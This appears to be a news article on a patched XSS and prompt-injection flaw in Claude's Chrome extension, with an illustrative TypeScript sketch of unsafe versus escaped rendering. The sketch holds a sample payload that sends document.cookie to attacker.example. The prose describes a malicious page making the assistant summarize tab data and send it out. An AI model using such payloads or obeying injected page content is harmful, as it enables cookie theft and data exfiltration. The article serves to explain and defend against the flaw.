A severe vulnerability in Anthropic's Claude AI extension for Google Chrome allowed any website to silently inject malicious prompts into the assistant, with no user interaction required. Security researchers discovered the flaw, and Anthropic patched it in mid-May.
The vulnerability, identified by researchers Oren Yomtov and Dolev Farhi of Koi Security, combined an insecure message-passing mechanism with a cross-site scripting (XSS) bug. According to Koi Security's report, a malicious website could send a specially crafted message to the Claude extension's content script, which processed the message and rendered the resulting content directly into the page's DOM without sanitization. This allowed the malicious site to execute arbitrary code within the extension's context.
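Koi Security's report does not publish the exploit code, but the pattern it describes is a classic one. The sketch below is purely illustrative: the function names, message shape, and payload are invented, and the real extension code is more complex. It contrasts a handler that concatenates attacker-controlled text straight into HTML with a patched variant that escapes it first.

```typescript
// Minimal HTML-escaping helper -- the kind of sanitization step whose absence
// enables this class of XSS bug.
function escapeHtml(text: string): string {
  return text
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;");
}

// Vulnerable pattern (hypothetical): the message body from the page is
// concatenated directly into an HTML string that a content script would then
// inject via innerHTML, so any markup in the message runs in the extension's
// context.
function renderResponseUnsafe(message: string): string {
  return `<div class="claude-response">${message}</div>`;
}

// Patched pattern: escape the untrusted input before it can reach the DOM,
// so the payload is rendered as inert text instead of live markup.
function renderResponseSafe(message: string): string {
  return `<div class="claude-response">${escapeHtml(message)}</div>`;
}

// An example payload of the kind a malicious page could post: an <img> tag
// whose error handler exfiltrates cookies to an attacker-controlled server.
const payload =
  `<img src=x onerror="fetch('https://attacker.example/?c='+document.cookie)">`;

console.log(renderResponseUnsafe(payload)); // script-bearing markup survives intact
console.log(renderResponseSafe(payload));   // markup is neutralized into plain text
```

In a real extension the fix is usually not a hand-rolled escaper but avoiding `innerHTML` for untrusted data entirely, e.g. assigning `textContent` or building DOM nodes explicitly; the sketch above only shows why unescaped interpolation is exploitable.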
This made it a zero-click exploit: an attacker could take control of the AI assistant simply by getting a user to visit a compromised webpage. The potential impact was significant. An attacker could exfiltrate data by commanding Claude to summarize sensitive information from the user's active tab and send it to an external server, perform unauthorized actions through the AI, or steal session cookies to hijack the user's accounts on other websites.
Koi Security reported the vulnerability to Anthropic on May 13, 2024. Anthropic responded quickly, releasing a patched version (2024.5.15) just two days later, on May 15; most users of the Claude extension should have received the fix automatically through the browser's update mechanism. The incident highlights the security challenges posed by browser extensions that integrate powerful AI tools, which can open new and potent attack vectors.




